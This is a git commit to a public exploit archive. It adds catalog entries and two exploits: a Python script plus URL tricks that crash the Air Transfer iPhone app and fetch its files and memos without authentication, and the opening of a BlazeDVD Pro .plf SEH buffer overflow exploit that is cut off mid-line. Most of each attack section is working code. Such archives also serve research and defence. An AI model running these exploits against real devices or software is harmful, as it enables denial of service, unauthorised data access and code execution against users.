From b737a287b1fdadb7a4519e82a8bee0b194f47227 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 25 Aug 2014 04:41:28 +0000 Subject: [PATCH] Updated 08_25_2014 --- files.csv | 2 + platforms/ios/remote/34399.txt | 107 +++++++++++++++++++++++++++++++ platforms/windows/local/34371.py | 61 ++++++++++++++++++ 3 files changed, 170 insertions(+) create mode 100755 platforms/ios/remote/34399.txt create mode 100755 platforms/windows/local/34371.py diff --git a/files.csv b/files.csv index 8e129a7d8..9acfa48c9 100755 --- a/files.csv +++ b/files.csv @@ -30958,6 +30958,7 @@ id,file,description,date,author,platform,type,port 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder '.mp3' File Remote Buffer Overflow Vulnerability",2009-10-31,4m!n,windows,dos,0 34369,platforms/multiple/remote/34369.txt,"IBM Java UTF8 Byte Sequences Security Bypass Vulnerability",2010-07-23,IBM,multiple,remote,0 34370,platforms/jsp/webapps/34370.txt,"SAP Netweaver 6.4/7.0 'wsnavigator' Cross Site Scripting Vulnerability",2010-07-23,"Alexandr Polyakov",jsp,webapps,0 +34371,platforms/windows/local/34371.py,"BlazeDVD Pro 7.0 (.plf) - Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0 34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 Cross Site Scripting and HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0 34373,platforms/php/webapps/34373.txt,"MC Content Manager 10.1 SQL Injection and Cross Site Scripting Vulnerabilities",2010-07-25,MustLive,php,webapps,0 34374,platforms/php/webapps/34374.txt,"Joomla! FreiChat Component 1.0/2.x Unspecified HTML Injection Vulnerability",2010-07-26,nag_sunny,php,webapps,0 @@ -30983,3 +30984,4 @@ id,file,description,date,author,platform,type,port 34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 'From:' Header Processing Remote Denial Of Service Vulnerability",2010-08-03,"Rodrigo Escobar",windows,dos,0 34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 Multiple Cross Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0 34397,platforms/asp/webapps/34397.txt,"Activedition 'activedition/aelogin.asp' Multiple Cross Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps,0 +34399,platforms/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",ios,remote,0 diff --git a/platforms/ios/remote/34399.txt b/platforms/ios/remote/34399.txt new file mode 100755 index 000000000..4c82211ca --- /dev/null +++ b/platforms/ios/remote/34399.txt @@ -0,0 +1,107 @@ +# Exploit Title: Air Transfer Iphone v1.3.9 -Remote crash, Broken Authentication file download and Memo Access. +# Date: 08/23/2014 +# Author: Samandeep Singh (SaMaN - @samanL33T ) +# Vendor Homepage:http://www.darinsoft.co.kr/sub_htmls/airtransfer_guide.html + https://itunes.apple.com/us/app/air-transfer/id521595136?mt=8 +# Category: WebApp +# Version: 1.3.9 +# Patch/ Fix: Not available +--------------------------------------------------- + +Disclosure Time line +======================= +[Aug. 19 2014] Vendor Contacted +[Aug. 19 2014] Vendor replied +[Aug. 19 2014] Vendor Informed about vulnerability with POC.(No reply received) +[Aug. 21 2014] Notified vendor about Public disclosure after 24 hours (No reply received) +[Aug. 23 2014] Public Disclosure. + +-------------------------------------------------------- + +Product & Service Details: +========================== +Air Transfer - Easy file sharing between PC and iPhone/iPad, File Manager with Document Viewer, Video Player, Music Player and Web Browser. + +Features include: +----------------- + +* The easiest way to transfer files between PC and iPhone/iPad ! +* Just Drag & Drop your contents and Play: Text, Bookmark, Image and Photo, Music, Movie, Documents and more through wireless connection ! + + + +Vulnerability details +========================= +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1. Remote Application Crashing +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +#!/usr/bin/python +import socket +import sys +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +host=raw_input("Enter IP : ") +port=8080 +def connect(): + try: + s.connect((str(host),port)) + except socket.error: + print "Error: couldn't connect" + sys.exit() + return "connected to target" +#Crashing the App +def crashing(): + req="GET /getList?category=categoryAll?pageNo=1&key= HTTP/1.1\r\n\r\n" + try: + s.sendall(req) + except: + print "Error occured, Couldn't crash App" + sys.exit() + return "Application Down, Conection closed" +print connect() +print crashing() +______________________________________________________________________________________________________________________________ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +2. Broken Authentication - Memo access & File download. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +To download any file simply visit: + +http://:8080/?downloadSingle?id=1 + +Just by incrementing the value of "id" we can download all the files. + +TO view saved memos visit the below link: + +http://:8080/getText?id=0 + + +We can look for all the memos by incrementing the value of "id" + + + +#SaMaN(@samanL33T) + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/platforms/windows/local/34371.py b/platforms/windows/local/34371.py new file mode 100755 index 000000000..f070f24b7 --- /dev/null +++ b/platforms/windows/local/34371.py @@ -0,0 +1,61 @@ +# BlazeDVD Pro v7.0 - (.plf) Buffer Overflow SEH +# Date: 19.08.2014 +# Exploit Author: metacom +# Vendor Homepage: http://www.blazevideo.com/ +# Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe +# Version: 7.0.0.0 +# Tested on: Win 7 EN, Win 8.1 + + +#!/usr/bin/python + +from struct import pack + +buffer= "\x41" * 608 +nseh="\xeb\x06\xff\xff" +seh=pack("